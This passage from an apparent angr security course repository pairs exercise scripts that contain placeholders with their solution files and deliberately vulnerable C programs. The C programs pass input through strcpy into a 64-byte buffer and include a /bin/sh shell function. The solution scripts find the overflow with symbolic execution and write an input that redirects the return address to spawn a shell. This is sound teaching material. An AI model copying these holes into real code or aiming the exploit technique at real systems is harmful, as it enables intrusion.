state has been found 40 | print "Searching for the vulnerability!" 
41 | while not simgr.vuln: 42 | # step the simgr 43 | pass 44 | # after each step, move all states matching our vuln filter from the active stash to the vuln stash 45 | pass 46 | 47 | # now synthesize our crashing input 48 | pass 49 | open("crashing_input", "w").write(crashing_input) 50 | print "You can crash the program by doing:" 51 | print "# cat crashing_input | ./overflow" 52 | -------------------------------------------------------------------------------- /vuln_discovery/vuln.solution.py: -------------------------------------------------------------------------------- 1 | import angr 2 | 3 | # load the binary 4 | project = angr.Project("overflow", load_options={ 'auto_load_libs': False }) 5 | 6 | # Make a simple security checker that checks for an overflow into the return address. There are several cases: 7 | # 8 | # 1. The return address is unchanged and pointing to an internal angr hook (i.e., __libc_start_main) 9 | # 2. The return address is unchanged and pointing inside the program (normal case) 10 | # 3. The return address has been overflowed, and we can point it outside of the program (we'll check for this) 11 | # 4. The return address has been partially overflowed, and still points inside the program (future work) 12 | def state_vuln_filter(state): 13 | # get the saved instruction pointer from the stack 14 | saved_eip = state.memory.load(state.regs.ebp + 4, 4, endness="Iend_LE") 15 | print "Checking saved EIP:", saved_eip 16 | 17 | # first, check if the return address points to a hook. If this is intact, then we assume there is no overflow 18 | if project.is_hooked(state.se.any_int(saved_eip)): 19 | return False 20 | 21 | # next, create constraints representing an unsafe condition. In this case, 22 | # let's check if the return address can point *outside* of the program. 
23 | unsafe_constraints = [ state.se.Or(saved_eip < project.loader.min_addr, saved_eip > project.loader.max_addr) ] 24 | 25 | # check if the state is satisfiable with these conditions, and return True if it is 26 | return state.se.satisfiable(extra_constraints=unsafe_constraints) 27 | 28 | # get a new simulation manager from the project factory 29 | simgr = project.factory.simgr() 30 | 31 | # initiate a "vuln" stash 32 | simgr.stashes['vuln'] = [ ] 33 | 34 | # the starting state has no return address on the stack, so it will trigger our vuln filter. 35 | # We can step it until it no longer triggers the filter before starting the actual analysis. 36 | print "Initializing initial state..." 37 | while state_vuln_filter(simgr.active[0]): 38 | simgr.step() 39 | 40 | # Now that we are all set up, let's loop until a vulnerable state has been found 41 | print "Searching for the vulnerability!" 42 | while not simgr.vuln: 43 | # step the simgr 44 | simgr.step() 45 | # after each step, move all states matching our vuln filter from the active stash to the vuln stash 46 | simgr.move('active', 'vuln', filter_func=state_vuln_filter) 47 | 48 | # now synthesize our crashing input 49 | crashing_input = simgr.vuln[0].state.posix.dumps(0) 50 | open("crashing_input", "w").write(crashing_input) 51 | print "You can crash the program by doing:" 52 | print "# cat crashing_input | ./overflow" 53 | -------------------------------------------------------------------------------- /vuln_discovery_2/overflow3-28d8a442fb232c0c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/angr/secdev-course/6fec37cf4f35444fcc12121ca3d3b37c8394fe7f/vuln_discovery_2/overflow3-28d8a442fb232c0c -------------------------------------------------------------------------------- /vuln_discovery_2/overflow3-28d8a442fb232c0c.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 
#include 5 | #include "dump_stack.h" 6 | 7 | /* 8 | * Goal: Get the program to run this function. 9 | */ 10 | void shell(void) { 11 | execl("/bin/sh", "sh", NULL); 12 | } 13 | 14 | void vuln(char *str) { 15 | char buf[64]; 16 | strcpy(buf, str); 17 | dump_stack((void **) buf, 21, (void **) &str); 18 | } 19 | 20 | int main(int argc, char **argv) { 21 | if (argc != 2) { 22 | printf("Usage: buffer_overflow [str]\n"); 23 | return 1; 24 | } 25 | 26 | uid_t euid = geteuid(); 27 | setresuid(euid, euid, euid); 28 | printf("shell function = %p\n", shell); 29 | vuln(argv[1]); 30 | return 0; 31 | } 32 | -------------------------------------------------------------------------------- /vuln_discovery_2/overflow3.py: -------------------------------------------------------------------------------- 1 | import angr 2 | import claripy 3 | 4 | # load the binary, but the original one this time! 5 | project = angr.Project("overflow3-28d8a442fb232c0c", load_options={ 'auto_load_libs': False }) 6 | 7 | # This time, we will need access to symbols (to figure out where the "shell" function is, for example). 8 | # Let's generate a CFG to fill in the knowledgebase. 9 | cfg = project.analyses.CFG() 10 | 11 | # This binary has some functionality that gives angr trouble. Specifically, the way it uses printf (printing pointers) 12 | # in both main() and dump_stack() is not properly handled by angr's printf SimProcedure. If you try to run this 13 | # code without compensating for that, it will hang (because it will error on all states and keep looping while looking 14 | # for a vuln state). So, to compensate for that, we override printf with a simprocedure that does nothing. 15 | pass 16 | 17 | # Make a simple security checker that checks for an overflow into the return address. There are several cases: 18 | # 19 | # 1. The return address is unchanged and pointing to an internal angr hook (i.e., __libc_start_main) 20 | # 2. 
The return address is unchanged and pointing inside the program (normal case) 21 | # 3. The return address has been overflowed, and we can point it outside of the program (we'll check for this) 22 | # 4. The return address has been partially overflowed, and still points inside the program (future work) 23 | def state_vuln_filter(state): 24 | # get the saved instruction pointer from the stack 25 | saved_eip = state.memory.load(state.regs.ebp + 4, 4, endness="Iend_LE") 26 | print "Checking saved EIP:", saved_eip 27 | 28 | # first, check if the return address points to a hook. If this is intact, then we assume there is no overflow 29 | if project.is_hooked(state.se.any_int(saved_eip)): 30 | return False 31 | 32 | # next, create constraints representing an unsafe condition. In this case, 33 | # let's check if the return address can point *outside* of the program. 34 | unsafe_constraints = [ state.se.Or(saved_eip < project.loader.min_addr, saved_eip > project.loader.max_addr) ] 35 | 36 | # check if the state is satisfiable with these conditions, and return True if it is 37 | return state.se.satisfiable(extra_constraints=unsafe_constraints) 38 | 39 | # This time, the initialization is a bit different. The application takes a commandline argument, so we must: 40 | # first, create a symbolic bitvector representing the argument. 41 | # We're interested in the last few bytes (the part that will actually overflow the return address), so make it a 42 | # concatenation of 60 concrete bytes and 30 symbolic bytes (240 bits).
43 | arg = claripy.BVV("A"*60).concat(claripy.BVS("arg", 240)) 44 | # next, create a state with this argument 45 | state = project.factory.entry_state(args=['overflow3', arg]) 46 | # now, create the simulation manager with that state as the initial state 47 | simgr = project.factory.simgr(state) 48 | 49 | # initiate a "vuln" stash 50 | simgr.stashes['vuln'] = [ ] 51 | 52 | # Since we have the address of main in the knowledgebase, let's make a less janky initialization procedure. 53 | print "Initializing initial state..." 54 | while simgr.active[0].addr != project.kb.functions['main'].addr: 55 | simgr.step() 56 | 57 | # Now that we are all set up, let's loop until a vulnerable state has been found 58 | print "Searching for the vulnerability!" 59 | while not simgr.vuln: 60 | # step the simgr 61 | simgr.step() 62 | # after each step, move all states matching our vuln filter from the active stash to the vuln stash 63 | simgr.move('active', 'vuln', filter_func=state_vuln_filter) 64 | 65 | # Now the fun part starts! Let's add a constraint that sets the overflowed return address to the "shell" function. 66 | # First, grab the stored return address in the vuln state 67 | print "Constraining saved return address!" 68 | vuln_state = simgr.vuln[0] 69 | overwritten_eip = vuln_state.memory.load(vuln_state.regs.ebp + 4, 4, endness="Iend_LE") 70 | print "Overwritten EIP:", overwritten_eip 71 | # Now, let's add a constraint to redirect that return address to the shell function 72 | addr_of_shell = project.kb.functions['shell'].addr 73 | vuln_state.add_constraints(overwritten_eip == addr_of_shell) 74 | 75 | # and now let's explore the vuln stash until we reach the shell 76 | print "Exploring to 'shell' function." 77 | simgr.explore(stash='vuln', find=addr_of_shell) 78 | 79 | # now synthesize our pwning input! 
80 | pwning_input = simgr.found[0].state.se.any_str(arg) 81 | open("pwning_input", "w").write(pwning_input.split('\0')[0]) # since it's a string arg, we only care up to the first null byte 82 | print "You can crash the program by doing:" 83 | print '# ./overflow3-28d8a442fb232c0c "$(cat pwning_input)"' 84 | -------------------------------------------------------------------------------- /vuln_discovery_2/overflow3.solution.py: -------------------------------------------------------------------------------- 1 | import angr 2 | import claripy 3 | 4 | # load the binary, but the original one this time! 5 | project = angr.Project("overflow3-28d8a442fb232c0c", load_options={ 'auto_load_libs': False }) 6 | 7 | # This time, we will need access to symbols (to figure out where the "shell" function is, for example). 8 | # Let's generate a CFG to fill in the knowledgebase. 9 | cfg = project.analyses.CFG() 10 | 11 | # This binary has some functionality that gives angr trouble. Specifically, the way it uses printf (printing pointers) 12 | # in both main() and dump_stack() is not properly handled by angr's printf SimProcedure. If you try to run this 13 | # code without compensating for that, it will hang (because it will error on all states and keep looping while looking 14 | # for a vuln state). So, to compensate for that, we override printf with a simprocedure that does nothing. 15 | class DoNothing(angr.SimProcedure): 16 | def run(self): 17 | return 18 | 19 | project.hook(project.kb.functions['printf'].addr, DoNothing) 20 | project.hook(project.kb.functions['dump_stack'].addr, DoNothing) 21 | 22 | # Make a simple security checker that checks for an overflow into the return address. There are several cases: 23 | # 24 | # 1. The return address is unchanged and pointing to an internal angr hook (i.e., __libc_start_main) 25 | # 2. The return address is unchanged and pointing inside the program (normal case) 26 | # 3. 
The return address has been overflowed, and we can point it outside of the program (we'll check for this) 27 | # 4. The return address has been partially overflowed, and still points inside the program (future work) 28 | def state_vuln_filter(state): 29 | # get the saved instruction pointer from the stack 30 | saved_eip = state.memory.load(state.regs.ebp + 4, 4, endness="Iend_LE") 31 | print "Checking saved EIP:", saved_eip 32 | 33 | # first, check if the return address points to a hook. If this is intact, then we assume there is no overflow 34 | if project.is_hooked(state.se.any_int(saved_eip)): 35 | return False 36 | 37 | # next, create constraints representing an unsafe condition. In this case, 38 | # let's check if the return address can point *outside* of the program. 39 | unsafe_constraints = [ state.se.Or(saved_eip < project.loader.min_addr, saved_eip > project.loader.max_addr) ] 40 | 41 | # check if the state is satisfiable with these conditions, and return True if it is 42 | return state.se.satisfiable(extra_constraints=unsafe_constraints) 43 | 44 | # This time, the initialization is a bit different. The application takes a commandline argument, so we must: 45 | # first, create a symbolic bitvector representing the argument. 46 | # We're interested in the last few bytes (the part that will actually overflow the return address), so make it a 47 | # concatenation of 60 concrete bytes and 30 symbolic bytes (240 bits). 48 | arg = claripy.BVV("A"*60).concat(claripy.BVS("arg", 240)) 49 | # next, create a state with this argument 50 | state = project.factory.entry_state(args=['overflow3', arg]) 51 | # now, create the simulation manager with that state as the initial state 52 | simgr = project.factory.simgr(state) 53 | 54 | # initiate a "vuln" stash 55 | simgr.stashes['vuln'] = [ ] 56 | 57 | # Since we have the address of main in the knowledgebase, let's make a less janky initialization procedure. 58 | print "Initializing initial state..."
59 | while simgr.active[0].addr != project.kb.functions['main'].addr: 60 | simgr.step() 61 | 62 | # Now that we are all set up, let's loop until a vulnerable state has been found 63 | print "Searching for the vulnerability!" 64 | while not simgr.vuln: 65 | # step the simgr 66 | simgr.step() 67 | # after each step, move all states matching our vuln filter from the active stash to the vuln stash 68 | simgr.move('active', 'vuln', filter_func=state_vuln_filter) 69 | 70 | # Now the fun part starts! Let's add a constraint that sets the overflowed return address to the "shell" function. 71 | # First, grab the stored return address in the vuln state 72 | print "Constraining saved return address!" 73 | vuln_state = simgr.vuln[0] 74 | overwritten_eip = vuln_state.memory.load(vuln_state.regs.ebp + 4, 4, endness="Iend_LE") 75 | print "Overwritten EIP:", overwritten_eip 76 | # Now, let's add a constraint to redirect that return address to the shell function 77 | addr_of_shell = project.kb.functions['shell'].addr 78 | vuln_state.add_constraints(overwritten_eip == addr_of_shell) 79 | 80 | # and now let's explore the vuln stash until we reach the shell 81 | print "Exploring to 'shell' function." 82 | simgr.explore(stash='vuln', find=addr_of_shell) 83 | 84 | # now synthesize our pwning input! 
85 | pwning_input = simgr.found[0].state.se.any_str(arg) 86 | open("pwning_input", "w").write(pwning_input.split('\0')[0]) # since it's a string arg, we only care up to the first null byte 87 | print "You can crash the program by doing:" 88 | print '# ./overflow3-28d8a442fb232c0c "$(cat pwning_input)"' 89 | -------------------------------------------------------------------------------- /vuln_discovery_simple/overflow3-simplified: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/angr/secdev-course/6fec37cf4f35444fcc12121ca3d3b37c8394fe7f/vuln_discovery_simple/overflow3-simplified -------------------------------------------------------------------------------- /vuln_discovery_simple/overflow3-simplified.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | //#include "dump_stack.h" 6 | 7 | /* 8 | * Goal: Get the program to run this function. 9 | */ 10 | void shell(void) { 11 | execl("/bin/sh", "sh", NULL); 12 | } 13 | 14 | void vuln(char *str) { 15 | char buf[64]; 16 | strcpy(buf, str); 17 | //dump_stack((void **) buf, 21, (void **) &str); 18 | } 19 | 20 | int main(int argc, char **argv) { 21 | if (argc != 2) { 22 | printf("Usage: buffer_overflow [str]\n"); 23 | return 1; 24 | } 25 | 26 | //uid_t euid = geteuid(); 27 | //setresuid(euid, euid, euid); 28 | //printf("shell function = %p\n", shell); 29 | vuln(argv[1]); 30 | return 0; 31 | } 32 | -------------------------------------------------------------------------------- /vuln_discovery_simple/overflow3.py: -------------------------------------------------------------------------------- 1 | import angr 2 | import claripy 3 | 4 | # load the binary 5 | project = angr.Project("overflow3-simplified", load_options={ 'auto_load_libs': False }) 6 | 7 | # This time, we will need access to symbols (to figure out where the "shell" function is, for example). 
8 | # Let's generate a CFG to fill in the knowledgebase. 9 | pass 10 | 11 | # Make a simple security checker that checks for an overflow into the return address. There are several cases: 12 | # 13 | # 1. The return address is unchanged and pointing to an internal angr hook (i.e., __libc_start_main) 14 | # 2. The return address is unchanged and pointing inside the program (normal case) 15 | # 3. The return address has been overflowed, and we can point it outside of the program (we'll check for this) 16 | # 4. The return address has been partially overflowed, and still points inside the program (future work) 17 | def state_vuln_filter(state): 18 | # get the saved instruction pointer from the stack 19 | saved_eip = state.memory.load(state.regs.ebp + 4, 4, endness="Iend_LE") 20 | print "Checking saved EIP:", saved_eip 21 | 22 | # first, check if the return address points to a hook. If this is intact, then we assume there is no overflow 23 | if project.is_hooked(state.se.any_int(saved_eip)): 24 | return False 25 | 26 | # next, create constraints representing an unsafe condition. In this case, 27 | # let's check if the return address can point *outside* of the program. 28 | unsafe_constraints = [ state.se.Or(saved_eip < project.loader.min_addr, saved_eip > project.loader.max_addr) ] 29 | 30 | # check if the state is satisfiable with these conditions, and return True if it is 31 | return state.se.satisfiable(extra_constraints=unsafe_constraints) 32 | 33 | # This time, the initialization is a bit different. The application takes a commandline argument, so we must: 34 | # first, create a symbolic bitvector representing the argument. 35 | # We're interested in the last few bytes (the part that will actually overflow the return address), so make it a 36 | # concatenation of 60 concrete bytes and 30 symbolic bytes (240 bits).
37 | pass 38 | # next, create a state with this argument 39 | pass 40 | # now, create the simulation manager with that state as the initial state 41 | simgr = project.factory.simgr(state) 42 | 43 | # initiate a "vuln" stash 44 | simgr.stashes['vuln'] = [ ] 45 | 46 | # Since we have the address of main in the knowledgebase, let's make a less janky initialization procedure. 47 | print "Initializing initial state..." 48 | while simgr.active[0].addr != project.kb.functions['main'].addr: 49 | simgr.step() 50 | 51 | # Now that we are all set up, let's loop until a vulnerable state has been found 52 | print "Searching for the vulnerability!" 53 | while not simgr.vuln: 54 | # step the simgr 55 | simgr.step() 56 | # after each step, move all states matching our vuln filter from the active stash to the vuln stash 57 | simgr.move('active', 'vuln', filter_func=state_vuln_filter) 58 | 59 | # Now the fun part starts! Let's add a constraint that sets the overflowed return address to the "shell" function. 60 | # First, grab the stored return address in the vuln state 61 | print "Constraining saved return address!" 62 | vuln_state = simgr.vuln[0] 63 | pass 64 | print "Overwritten EIP:", overwritten_eip 65 | # Now, let's add a constraint to redirect that return address to the shell function 66 | addr_of_shell = project.kb.functions['shell'].addr 67 | pass 68 | 69 | # and now let's explore the vuln stash until we reach the shell 70 | print "Exploring to 'shell' function." 71 | pass 72 | 73 | # now synthesize our pwning input! 
74 | pass 75 | open("pwning_input", "w").write(pwning_input.split('\0')[0]) # since it's a string arg, we only care up to the first null byte 76 | print "You can crash the program by doing:" 77 | print '# ./overflow3-simplified "$(cat pwning_input)"' 78 | -------------------------------------------------------------------------------- /vuln_discovery_simple/overflow3.solution.py: -------------------------------------------------------------------------------- 1 | import angr 2 | import claripy 3 | 4 | # load the binary 5 | project = angr.Project("overflow3-simplified", load_options={ 'auto_load_libs': False }) 6 | 7 | # This time, we will need access to symbols (to figure out where the "shell" function is, for example). 8 | # Let's generate a CFG to fill in the knowledgebase. 9 | cfg = project.analyses.CFG() 10 | 11 | # Make a simple security checker that checks for an overflow into the return address. There are several cases: 12 | # 13 | # 1. The return address is unchanged and pointing to an internal angr hook (i.e., __libc_start_main) 14 | # 2. The return address is unchanged and pointing inside the program (normal case) 15 | # 3. The return address has been overflowed, and we can point it outside of the program (we'll check for this) 16 | # 4. The return address has been partially overflowed, and still points inside the program (future work) 17 | def state_vuln_filter(state): 18 | # get the saved instruction pointer from the stack 19 | saved_eip = state.memory.load(state.regs.ebp + 4, 4, endness="Iend_LE") 20 | print "Checking saved EIP:", saved_eip 21 | 22 | # first, check if the return address points to a hook. If this is intact, then we assume there is no overflow 23 | if project.is_hooked(state.se.any_int(saved_eip)): 24 | return False 25 | 26 | # next, create constraints representing an unsafe condition. In this case, 27 | # let's check if the return address can point *outside* of the program. 
28 | unsafe_constraints = [ state.se.Or(saved_eip < project.loader.min_addr, saved_eip > project.loader.max_addr) ] 29 | 30 | # check if the state is satisfiable with these conditions, and return True if it is 31 | return state.se.satisfiable(extra_constraints=unsafe_constraints) 32 | 33 | # This time, the initialization is a bit different. The application takes a commandline argument, so we must: 34 | # first, create a symbolic bitvector representing the argument. 35 | # We're interested in the last few bytes (the part that will actually overflow the return address), so make it a 36 | # concatenation of 60 concrete bytes and 30 symbolic bytes (240 bits). 37 | arg = claripy.BVV("A"*60).concat(claripy.BVS("arg", 240)) 38 | # next, create a state with this argument 39 | state = project.factory.entry_state(args=['overflow3', arg]) 40 | # now, create the simulation manager with that state as the initial state 41 | simgr = project.factory.simgr(state) 42 | 43 | # initiate a "vuln" stash 44 | simgr.stashes['vuln'] = [ ] 45 | 46 | # Since we have the address of main in the knowledgebase, let's make a less janky initialization procedure. 47 | print "Initializing initial state..." 48 | while simgr.active[0].addr != project.kb.functions['main'].addr: 49 | simgr.step() 50 | 51 | # Now that we are all set up, let's loop until a vulnerable state has been found 52 | print "Searching for the vulnerability!" 53 | while not simgr.vuln: 54 | # step the simgr 55 | simgr.step() 56 | # after each step, move all states matching our vuln filter from the active stash to the vuln stash 57 | simgr.move('active', 'vuln', filter_func=state_vuln_filter) 58 | 59 | # Now the fun part starts! Let's add a constraint that sets the overflowed return address to the "shell" function. 60 | # First, grab the stored return address in the vuln state 61 | print "Constraining saved return address!"
62 | vuln_state = simgr.vuln[0] 63 | overwritten_eip = vuln_state.memory.load(vuln_state.regs.ebp + 4, 4, endness="Iend_LE") 64 | print "Overwritten EIP:", overwritten_eip 65 | # Now, let's add a constraint to redirect that return address to the shell function 66 | addr_of_shell = project.kb.functions['shell'].addr 67 | vuln_state.add_constraints(overwritten_eip == addr_of_shell) 68 | 69 | # and now let's explore the vuln stash until we reach the shell 70 | print "Exploring to 'shell' function." 71 | simgr.explore(stash='vuln', find=addr_of_shell) 72 | 73 | # now synthesize our pwning input! 74 | pwning_input = simgr.found[0].se.any_str(arg) 75 | open("pwning_input", "w").write(pwning_input.split('\0')[0]) # since it's a string arg, we only care up to the first null byte 76 | print "You can crash the program by doing:" 77 | print '# ./overflow3-simplified "$(cat pwning_input)"' 78 | --------------------------------------------------------------------------------